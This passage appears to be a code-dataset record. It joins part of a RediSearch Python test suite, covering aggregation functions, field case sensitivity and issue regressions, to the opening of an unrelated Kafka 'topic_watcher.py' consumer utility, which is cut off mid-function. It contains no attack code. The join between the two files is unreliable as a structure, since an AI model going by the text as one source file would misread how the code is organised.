env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt(235325153152356426246246246254)', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt(@test, "%s")' % ('d' * 2048), 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'hour("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'minute("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'day("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'month("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'dayofweek("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'dayofmonth("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'dayofyear("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'year("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'monthofyear("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
def testMonthOfYear(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'NUMERIC').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '12234556').equal('OK')
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'monthofyear(@test)', 'as', 'a').equal([1L, ['test', '12234556', 'a', '4']])
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'monthofyear(@test, 112)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'monthofyear()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'monthofyear("bad")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
def testParseTimeErrors(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'NUMERIC').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '12234556').equal('OK')
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'parse_time()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'parse_time(11)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'parse_time(11,22)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'parse_time("%s", "%s")' % ('d' * 2048, 'd' * 2048), 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'parse_time("test", "%s")' % ('d' * 2048), 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
def testMathFunctions(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'NUMERIC').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '12234556').equal('OK')
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'exp(@test)', 'as', 'a').equal([1L, ['test', '12234556', 'a', 'inf']])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'ceil(@test)', 'as', 'a').equal([1L, ['test', '12234556', 'a', '12234556']])
def testErrorOnOpperation(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'NUMERIC').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '12234556').equal('OK')
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', '1 + split()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'split() + 1', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', '"bad" + "bad"', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'split("bad" + "bad")', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', '!(split("bad" + "bad"))', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'APPLY', '!@test', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
def testSortkeyUnsortable(env):
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 'test', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 'test', 'foo')
rv = env.cmd('ft.aggregate', 'idx', 'foo', 'withsortkeys',
'load', '1', '@test',
'sortby', '1', '@test')
env.assertEqual([1, '$foo', ['test', 'foo']], rv)
def testIssue919(env):
# This only works if the missing field has a lower sortable index
# than the present field.
env.cmd('ft.create', 'idx', 'ON', 'HASH',
'schema', 't1', 'text', 'sortable', 'n1', 'numeric', 'sortable')
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 'n1', 42)
rv = env.cmd('ft.search', 'idx', '*', 'sortby', 't1', 'desc')
env.assertEqual([1L, 'doc1', ['n1', '42']], rv)
def testIssue1074(env):
# Ensure that sortable fields are returned in their string form from the
# document
env.cmd('ft.create', 'idx', 'ON', 'HASH',
'schema', 't1', 'text', 'n1', 'numeric', 'sortable')
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 't1', 'hello', 'n1', 1581011976800)
rv = env.cmd('ft.search', 'idx', '*', 'sortby', 'n1')
env.assertEqual([1L, 'doc1', ['n1', '1581011976800', 't1', 'hello']], rv)
def testIssue1085(env):
env.skipOnCluster()
env.cmd('FT.CREATE issue1085 ON HASH SCHEMA foo TEXT SORTABLE bar NUMERIC SORTABLE')
for i in range(1, 10):
env.cmd('FT.ADD issue1085 document_%d 1 REPLACE FIELDS foo foo%d bar %d' % (i, i, i))
res = env.cmd('FT.SEARCH', 'issue1085', '@bar:[8 8]')
env.assertEqual(toSortedFlatList(res), toSortedFlatList([1L, 'document_8', ['foo', 'foo8', 'bar', '8']]))
for i in range(1, 10):
env.cmd('FT.ADD issue1085 document_8 1 REPLACE FIELDS foo foo8 bar 8')
env.expect('ft.debug GC_FORCEINVOKE issue1085').equal('DONE')
res = env.cmd('FT.SEARCH', 'issue1085', '@bar:[8 8]')
env.assertEqual(toSortedFlatList(res), toSortedFlatList([1, 'document_8', ['foo', 'foo8', 'bar', '8']]))
def grouper(iterable, n, fillvalue=None):
"Collect data into fixed-length chunks or blocks"
from itertools import izip_longest
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(fillvalue=fillvalue, *args)
def to_dict(r):
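# Converts a flat reply list into a dict, e.g.
# to_dict(['key1', 'val1', 'key2', 'val2']) -> {'key1': 'val1', 'key2': 'val2'}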
return {r[i]: r[i + 1] for i in range(0, len(r), 2)}
def testInfoError(env):
env.expect('ft.info', 'no_idx').error()
def testIndexNotRemovedFromCursorListAfterRecreated(env):
env.expect('FT.CREATE idx ON HASH SCHEMA f1 TEXT').ok()
env.expect('FT.AGGREGATE idx * WITHCURSOR').equal([[0], 0])
env.expect('FT.CREATE idx ON HASH SCHEMA f1 TEXT').error()
env.expect('FT.AGGREGATE idx * WITHCURSOR').equal([[0], 0])
def testHindiStemmer(env):
env.cmd('FT.CREATE', 'idxTest', 'LANGUAGE_FIELD', '__language', 'SCHEMA', 'body', 'TEXT')
env.cmd('FT.ADD', 'idxTest', 'doc1', 1.0, 'LANGUAGE', 'hindi', 'FIELDS', 'body', u'अँगरेजी अँगरेजों अँगरेज़')
res = env.cmd('FT.SEARCH', 'idxTest', u'अँगरेज़')
res1 = {res[2][i]:res[2][i + 1] for i in range(0, len(res[2]), 2)}
env.assertEqual(u'अँगरेजी अँगरेजों अँगरेज़', unicode(res1['body'], 'utf-8'))
def testMOD507(env):
env.skipOnCluster()
env.expect('ft.create idx ON HASH SCHEMA t1 TEXT').ok()
for i in range(50):
env.expect('ft.add idx doc-%d 1.0 FIELDS t1 foo' % i).ok()
for i in range(50):
env.expect('del doc-%d' % i).equal(1)
res = env.cmd('FT.SEARCH', 'idx', '*', 'WITHSCORES', 'SUMMARIZE', 'FRAGS', '1', 'LEN', '25', 'HIGHLIGHT', 'TAGS', "<span style='background-color:yellow'>", "</span>")
# from redisearch 2.0, docs are removed from index when `DEL` is called
env.assertEqual(len(res), 1)
def testUnseportedSortableTypeErrorOnTags(env):
env.skipOnCluster()
env.expect('FT.CREATE idx ON HASH SCHEMA f1 TEXT SORTABLE f2 NUMERIC SORTABLE NOINDEX f3 TAG SORTABLE NOINDEX f4 TEXT SORTABLE NOINDEX').ok()
env.expect('FT.ADD idx doc1 1.0 FIELDS f1 foo1 f2 1 f3 foo1 f4 foo1').ok()
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL FIELDS f2 2 f3 foo2 f4 foo2').ok()
res = env.cmd('HGETALL doc1')
env.assertEqual(toSortedFlatList(res), toSortedFlatList(['f1', 'foo1', 'f2', '2', 'f3', 'foo2', 'f4', 'foo2', '__score', '1.0']))
res = env.cmd('FT.SEARCH idx *')
env.assertEqual(toSortedFlatList(res), toSortedFlatList([1L, 'doc1', ['f1', 'foo1', 'f2', '2', 'f3', 'foo2', 'f4', 'foo2']]))
def testIssue1158(env):
env.cmd('FT.CREATE idx ON HASH SCHEMA txt1 TEXT txt2 TEXT txt3 TEXT')
env.cmd('FT.ADD idx doc1 1.0 FIELDS txt1 10 txt2 num1')
res = env.cmd('FT.GET idx doc1')
env.assertEqual(toSortedFlatList(res), toSortedFlatList(['txt1', '10', 'txt2', 'num1']))
# only the 1st operand is evaluated (the 2nd would return an error)
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if @txt1||to_number(@txt2)<5 FIELDS txt1 5').equal('OK')
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if @txt3&&to_number(@txt2)<5 FIELDS txt1 5').equal('NOADD')
# both are checked
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if to_number(@txt1)>11||to_number(@txt1)>42 FIELDS txt2 num2').equal('NOADD')
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if to_number(@txt1)>11||to_number(@txt1)<42 FIELDS txt2 num2').equal('OK')
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if to_number(@txt1)>11&&to_number(@txt1)>42 FIELDS txt2 num2').equal('NOADD')
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if to_number(@txt1)>11&&to_number(@txt1)<42 FIELDS txt2 num2').equal('NOADD')
res = env.cmd('FT.GET idx doc1')
env.assertEqual(toSortedFlatList(res), toSortedFlatList(['txt1', '5', 'txt2', 'num2']))
def testIssue1159(env):
env.cmd('FT.CREATE idx ON HASH SCHEMA f1 TAG')
for i in range(1000):
env.cmd('FT.add idx doc%d 1.0 FIELDS f1 foo' % i)
def testIssue1169(env):
env.cmd('FT.CREATE idx ON HASH SCHEMA txt1 TEXT txt2 TEXT')
env.cmd('FT.ADD idx doc1 1.0 FIELDS txt1 foo')
env.expect('FT.AGGREGATE idx foo GROUPBY 1 @txt1 REDUCE FIRST_VALUE 1 @txt2 as test').equal([1L, ['txt1', 'foo', 'test', None]])
def testIssue1184(env):
env.skipOnCluster()
field_types = ['TEXT', 'NUMERIC', 'TAG']
env.assertOk(env.execute_command('ft.config', 'set', 'FORK_GC_CLEAN_THRESHOLD', 0))
for ft in field_types:
env.assertOk(env.execute_command('FT.CREATE idx ON HASH SCHEMA field ' + ft))
res = env.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(d['inverted_sz_mb'], '0')
env.assertEqual(d['num_records'], '0')
value = '42'
env.assertOk(env.execute_command('FT.ADD idx doc0 1 FIELD field ' + value))
doc = env.cmd('FT.SEARCH idx *')
env.assertEqual(doc, [1L, 'doc0', ['field', value]])
res = env.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertGreater(d['inverted_sz_mb'], '0')
env.assertEqual(d['num_records'], '1')
env.assertEqual(env.execute_command('FT.DEL idx doc0'), 1)
env.cmd('ft.debug', 'GC_FORCEINVOKE', 'idx')
res = env.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(d['inverted_sz_mb'], '0')
env.assertEqual(d['num_records'], '0')
env.cmd('FT.DROP idx')
env.cmd('DEL doc0')
def testIndexListCommand(env):
env.expect('FT.CREATE idx1 ON HASH SCHEMA n NUMERIC').ok()
env.expect('FT.CREATE idx2 ON HASH SCHEMA n NUMERIC').ok()
res = env.cmd('FT._LIST')
env.assertEqual(set(res), set(['idx1', 'idx2']))
env.expect('FT.DROP idx1').ok()
env.expect('FT._LIST').equal(['idx2'])
env.expect('FT.CREATE idx3 ON HASH SCHEMA n NUMERIC').ok()
res = env.cmd('FT._LIST')
env.assertEqual(set(res), set(['idx2', 'idx3']))
def testIssue1208(env):
env.cmd('FT.CREATE idx ON HASH SCHEMA n NUMERIC')
env.cmd('FT.ADD idx doc1 1 FIELDS n 1.0321e5')
env.cmd('FT.ADD idx doc2 1 FIELDS n 101.11')
env.cmd('FT.ADD idx doc3 1 FIELDS n 0.0011')
env.expect('FT.SEARCH', 'idx', '@n:[1.1432E3 inf]').equal([1L, 'doc1', ['n', '1.0321e5']])
env.expect('FT.SEARCH', 'idx', '@n:[-1.12E-3 1.12E-1]').equal([1L, 'doc3', ['n', '0.0011']])
res = [3L, 'doc3', ['n', '0.0011'], 'doc2', ['n', '101.11'], 'doc1', ['n', '1.0321e5']]
env.expect('FT.SEARCH', 'idx', '@n:[-inf inf]').equal(res)
env.expect('FT.ADD idx doc3 1 REPLACE PARTIAL IF @n>42e3 FIELDS n 100').equal('NOADD')
env.expect('FT.ADD idx doc3 1 REPLACE PARTIAL IF @n<42e3 FIELDS n 100').ok()
# print env.cmd('FT.SEARCH', 'idx', '@n:[-inf inf]')
def testFieldsCaseSensetive(env):
# this test will not currently pass on the coordinator: if one shard returns empty results, the coordinator
# will not reflect the errors
env.skipOnCluster()
conn = getConnectionByEnv(env)
env.cmd('FT.CREATE idx ON HASH SCHEMA n NUMERIC f TEXT t TAG g GEO')
# make sure text fields are case sensitive
conn.execute_command('hset', 'doc1', 'F', 'test')
conn.execute_command('hset', 'doc2', 'f', 'test')
env.expect('ft.search idx @f:test').equal([1L, 'doc2', ['f', 'test']])
env.expect('ft.search idx @F:test').equal([0])
# make sure numeric fields are case sensitive
conn.execute_command('hset', 'doc3', 'N', '1.0')
conn.execute_command('hset', 'doc4', 'n', '1.0')
env.expect('ft.search', 'idx', '@n:[0 2]').equal([1L, 'doc4', ['n', '1.0']])
env.expect('ft.search', 'idx', '@N:[0 2]').equal([0])
# make sure tag fields are case sensitive
conn.execute_command('hset', 'doc5', 'T', 'tag')
conn.execute_command('hset', 'doc6', 't', 'tag')
env.expect('ft.search', 'idx', '@t:{tag}').equal([1L, 'doc6', ['t', 'tag']])
env.expect('ft.search', 'idx', '@T:{tag}').equal([0])
# make sure geo fields are case sensitive
conn.execute_command('hset', 'doc8', 'G', '-113.524,53.5244')
conn.execute_command('hset', 'doc9', 'g', '-113.524,53.5244')
env.expect('ft.search', 'idx', '@g:[-113.52 53.52 20 mi]').equal([1L, 'doc9', ['g', '-113.524,53.5244']])
env.expect('ft.search', 'idx', '@G:[-113.52 53.52 20 mi]').equal([0])
# make sure search filter are case sensitive
env.expect('ft.search', 'idx', '@n:[0 2]', 'FILTER', 'n', 0, 2).equal([1L, 'doc4', ['n', '1.0']])
env.expect('ft.search', 'idx', '@n:[0 2]', 'FILTER', 'N', 0, 2).equal([0])
# make sure RETURN are case sensitive
env.expect('ft.search', 'idx', '@n:[0 2]', 'RETURN', '1', 'n').equal([1L, 'doc4', ['n', '1']])
env.expect('ft.search', 'idx', '@n:[0 2]', 'RETURN', '1', 'N').equal([1L, 'doc4', []])
# make sure SORTBY are case sensitive
conn.execute_command('hset', 'doc7', 'n', '1.1')
env.expect('ft.search', 'idx', '@n:[0 2]', 'SORTBY', 'n').equal([2L, 'doc4', ['n', '1.0'], 'doc7', ['n', '1.1']])
env.expect('ft.search', 'idx', '@n:[0 2]', 'SORTBY', 'N').error().contains('not loaded nor in schema')
# make sure aggregation load are case sensitive
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'LOAD', '1', '@n').equal([1L, ['n', '1'], ['n', '1.1']])
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'LOAD', '1', '@N').equal([1L, [], []])
# make sure aggregation apply are case sensitive
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'LOAD', '1', '@n', 'apply', '@n', 'as', 'r').equal([1L, ['n', '1', 'r', '1'], ['n', '1.1', 'r', '1.1']])
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'LOAD', '1', '@n', 'apply', '@N', 'as', 'r').error().contains('not loaded in pipeline')
# make sure aggregation filter are case sensitive
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'LOAD', '1', '@n', 'filter', '@n==1.0').equal([1L, ['n', '1']])
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'LOAD', '1', '@n', 'filter', '@N==1.0').error().contains('not loaded in pipeline')
# make sure aggregation groupby are case sensitive
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'LOAD', '1', '@n', 'groupby', '1', '@n', 'reduce', 'count', 0, 'as', 'count').equal([2L, ['n', '1', 'count', '1'], ['n', '1.1', 'count', '1']])
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'LOAD', '1', '@n', 'groupby', '1', '@N', 'reduce', 'count', 0, 'as', 'count').error().contains('No such property')
# make sure aggregation sortby are case sensitive
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'LOAD', '1', '@n', 'sortby', '1', '@n').equal([2L, ['n', '1'], ['n', '1.1']])
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'LOAD', '1', '@n', 'sortby', '1', '@N').error().contains('not loaded')
def testSortedFieldsCaseSensetive(env):
# this test will not currently pass on the coordinator: if one shard returns empty results, the coordinator
# will not reflect the errors
env.skipOnCluster()
conn = getConnectionByEnv(env)
env.cmd('FT.CREATE idx ON HASH SCHEMA n NUMERIC SORTABLE f TEXT SORTABLE t TAG SORTABLE g GEO SORTABLE')
# make sure text fields are case sensitive
conn.execute_command('hset', 'doc1', 'F', 'test')
conn.execute_command('hset', 'doc2', 'f', 'test')
env.expect('ft.search idx @f:test').equal([1L, 'doc2', ['f', 'test']])
env.expect('ft.search idx @F:test').equal([0])
# make sure numeric fields are case sensitive
conn.execute_command('hset', 'doc3', 'N', '1.0')
conn.execute_command('hset', 'doc4', 'n', '1.0')
env.expect('ft.search', 'idx', '@n:[0 2]').equal([1L, 'doc4', ['n', '1.0']])
env.expect('ft.search', 'idx', '@N:[0 2]').equal([0])
# make sure tag fields are case sensitive
conn.execute_command('hset', 'doc5', 'T', 'tag')
conn.execute_command('hset', 'doc6', 't', 'tag')
env.expect('ft.search', 'idx', '@t:{tag}').equal([1L, 'doc6', ['t', 'tag']])
env.expect('ft.search', 'idx', '@T:{tag}').equal([0])
# make sure geo fields are case sensitive
conn.execute_command('hset', 'doc8', 'G', '-113.524,53.5244')
conn.execute_command('hset', 'doc9', 'g', '-113.524,53.5244')
env.expect('ft.search', 'idx', '@g:[-113.52 53.52 20 mi]').equal([1L, 'doc9', ['g', '-113.524,53.5244']])
env.expect('ft.search', 'idx', '@G:[-113.52 53.52 20 mi]').equal([0])
# make sure search filter are case sensitive
env.expect('ft.search', 'idx', '@n:[0 2]', 'FILTER', 'n', 0, 2).equal([1L, 'doc4', ['n', '1.0']])
env.expect('ft.search', 'idx', '@n:[0 2]', 'FILTER', 'N', 0, 2).equal([0])
# make sure RETURN are case sensitive
env.expect('ft.search', 'idx', '@n:[0 2]', 'RETURN', '1', 'n').equal([1L, 'doc4', ['n', '1']])
env.expect('ft.search', 'idx', '@n:[0 2]', 'RETURN', '1', 'N').equal([1L, 'doc4', []])
# make sure SORTBY are case sensitive
conn.execute_command('hset', 'doc7', 'n', '1.1')
env.expect('ft.search', 'idx', '@n:[0 2]', 'SORTBY', 'n').equal([2L, 'doc4', ['n', '1.0'], 'doc7', ['n', '1.1']])
env.expect('ft.search', 'idx', '@n:[0 2]', 'SORTBY', 'N').error().contains('not loaded nor in schema')
# make sure aggregation apply are case sensitive
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'apply', '@n', 'as', 'r').equal([1L, ['n', '1', 'r', '1'], ['n', '1.1', 'r', '1.1']])
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'apply', '@N', 'as', 'r').error().contains('not loaded in pipeline')
# make sure aggregation filter are case sensitive
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'filter', '@n==1.0').equal([1L, ['n', '1']])
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'filter', '@N==1.0').error().contains('not loaded in pipeline')
# make sure aggregation groupby are case sensitive
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'groupby', '1', '@n', 'reduce', 'count', 0, 'as', 'count').equal([2L, ['n', '1', 'count', '1'], ['n', '1.1', 'count', '1']])
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'groupby', '1', '@N', 'reduce', 'count', 0, 'as', 'count').error().contains('No such property')
# make sure aggregation sortby are case sensitive
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'sortby', '1', '@n').equal([2L, ['n', '1'], ['n', '1.1']])
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'sortby', '1', '@N').error().contains('not loaded')
def testScoreLangPayloadAreReturnedIfCaseNotMatchToSpecialFields(env):
conn = getConnectionByEnv(env)
env.cmd('FT.CREATE idx ON HASH SCHEMA n NUMERIC SORTABLE')
conn.execute_command('hset', 'doc1', 'n', '1.0', '__Language', 'eng', '__Score', '1', '__Payload', '10')
res = env.cmd('ft.search', 'idx', '@n:[0 2]')
env.assertEqual(toSortedFlatList(res), toSortedFlatList([1L, 'doc1', ['n', '1.0', '__Language', 'eng', '__Score', '1', '__Payload', '10']]))
def testReturnSameFieldDifferentCase(env):
conn = getConnectionByEnv(env)
env.cmd('FT.CREATE idx ON HASH SCHEMA n NUMERIC SORTABLE N NUMERIC SORTABLE')
conn.execute_command('hset', 'doc1', 'n', '1.0', 'N', '2.0')
env.expect('ft.search', 'idx', '@n:[0 2]', 'RETURN', '2', 'n', 'N').equal([1L, 'doc1', ['n', '1', 'N', '2']])
def testCreateIfNX(env):
env.expect('FT._CREATEIFNX idx ON HASH SCHEMA n NUMERIC SORTABLE N NUMERIC SORTABLE').ok()
env.expect('FT._CREATEIFNX idx ON HASH SCHEMA n NUMERIC SORTABLE N NUMERIC SORTABLE').ok()
def testDropIfX(env):
env.expect('FT._DROPIFX idx').ok()
def testDeleteIfX(env):
env.expect('FT._DROPINDEXIFX idx').ok()
def testAlterIfNX(env):
env.expect('FT.CREATE idx ON HASH SCHEMA n NUMERIC').ok()
env.expect('FT._ALTERIFNX idx SCHEMA ADD n1 NUMERIC').ok()
env.expect('FT._ALTERIFNX idx SCHEMA ADD n1 NUMERIC').ok()
res = env.cmd('ft.info idx')
res = {res[i]: res[i + 1] for i in range(0, len(res), 2)}['fields']
env.assertEqual(res, [['n', 'type', 'NUMERIC'], ['n1', 'type', 'NUMERIC']])
def testAliasAddIfNX(env):
env.expect('FT.CREATE idx ON HASH SCHEMA n NUMERIC').ok()
env.expect('FT._ALIASADDIFNX a1 idx').ok()
env.expect('FT._ALIASADDIFNX a1 idx').ok()
def testAliasDelIfX(env):
env.expect('FT._ALIASDELIFX a1').ok()
def testEmptyDoc(env):
conn = getConnectionByEnv(env)
env.expect('FT.CREATE idx SCHEMA t TEXT').ok()
env.expect('FT.ADD idx doc1 1 FIELDS t foo').ok()
env.expect('FT.ADD idx doc2 1 FIELDS t foo').ok()
env.expect('FT.ADD idx doc3 1 FIELDS t foo').ok()
env.expect('FT.ADD idx doc4 1 FIELDS t foo').ok()
env.expect('FT.SEARCH idx * limit 0 0').equal([4])
conn.execute_command('DEL', 'doc1')
conn.execute_command('DEL', 'doc3')
env.expect('FT.SEARCH idx *').equal([2L, 'doc4', ['t', 'foo'], 'doc2', ['t', 'foo']])
def testInvertedIndexWasEntirelyDeletedDuringCursor():
env = Env(moduleArgs='GC_POLICY FORK FORK_GC_CLEAN_THRESHOLD 1')
env.skipOnCluster()
env.expect('FT.CREATE idx SCHEMA t TEXT').ok()
env.expect('HSET doc1 t foo').equal(1)
env.expect('HSET doc2 t foo').equal(1)
res, cursor = env.cmd('FT.AGGREGATE idx foo WITHCURSOR COUNT 1')
env.assertEqual(res, [1L, []])
# delete both documents and run the GC to clean 'foo' inverted index
env.expect('DEL doc1').equal(1)
env.expect('DEL doc2').equal(1)
env.cmd('FT.DEBUG GC_FORCEINVOKE idx')
# make sure the inverted index was cleaned
env.expect('FT.DEBUG DUMP_INVIDX idx foo').error().contains('not find the inverted index')
# read from the cursor
res, cursor = env.cmd('FT.CURSOR READ idx %d' % cursor)
env.assertEqual(res, [0L])
env.assertEqual(cursor, 0)
def testNegativeOnly(env):
conn = getConnectionByEnv(env)
env.expect('FT.CREATE idx SCHEMA t TEXT').ok()
conn.execute_command('HSET', 'doc1', 'not', 'foo')
env.expect('FT.SEARCH idx *').equal([1L, 'doc1', ['not', 'foo']])
env.expect('FT.SEARCH', 'idx', '-bar').equal([1L, 'doc1', ['not', 'foo']])
def testNotOnly(env):
conn = getConnectionByEnv(env)
conn.execute_command('FT.CREATE', 'idx', 'SCHEMA', 'txt1', 'TEXT')
conn.execute_command('HSET', 'a', 'txt1', 'hello', 'txt2', 'world')
conn.execute_command('HSET', 'b', 'txt1', 'world', 'txt2', 'hello')
env.expect('ft.search idx !world').equal([1L, 'b', ['txt1', 'world', 'txt2', 'hello']])
|
topic_watcher.py
|
"""
This utility watches the "announce" topic on the Kafka broker and launches logging
consumers when a new announcement is made. It is also responsible for
maintaining the metadata database, which keeps track of the different runs.
Additionally, this tool reaps dead experiments and marks them as complete in the
main tab.
"""
import atexit
import datetime
import logging
import multiprocessing
import os
import time
import msgpack
import tinydb
from confluent_kafka import Consumer, KafkaException
from confluent_kafka.admin import AdminClient, NewTopic
from madera.globals import MType
from madera.util import mkdir_p, sanitize_path
from madera.consumer.topic_listener import launch_topic_listener
_PROC_DB = {} # type: ignore
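# The announce messages consumed below are msgpack-encoded dicts. Based on the
# handlers in this file, a creation announcement looks roughly like this
# (illustrative sketch only; field names are taken from process_create_message below):
#   {'type': MType.ANNOUNCE_CREATE.value, 'experiment': 'my_exp',
#    'run_id': 'run-001', 'rank_id': 0}
# A disconnect announcement uses MType.ANNOUNCE_DIE.value with the same keys.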
def process_message(msg, run_db, data_directory, api_key, port, adm_cli):
global _PROC_DB # pylint: disable=global-statement
# Parse the message
message = msgpack.loads(msg, encoding='utf-8')
if 'type' not in message:
logging.error('Invalid message received')
return
if message['type'] == MType.ANNOUNCE_CREATE.value:
# Register the experiment and run
# Create and register the experiment
if not process_create_message(message, run_db, data_directory, api_key, port):
return
elif message['type'] == MType.ANNOUNCE_DIE.value:
process_disconnect_message(message, run_db, adm_cli)
def process_disconnect_message(message, run_db, adm_cli):
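# Short delay before handling the disconnect, presumably so that any messages the
# departing producer sent just before announcing its exit have time to arrive.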
time.sleep(5)
# Get the experiment
experiment_table = run_db.table('experiments')
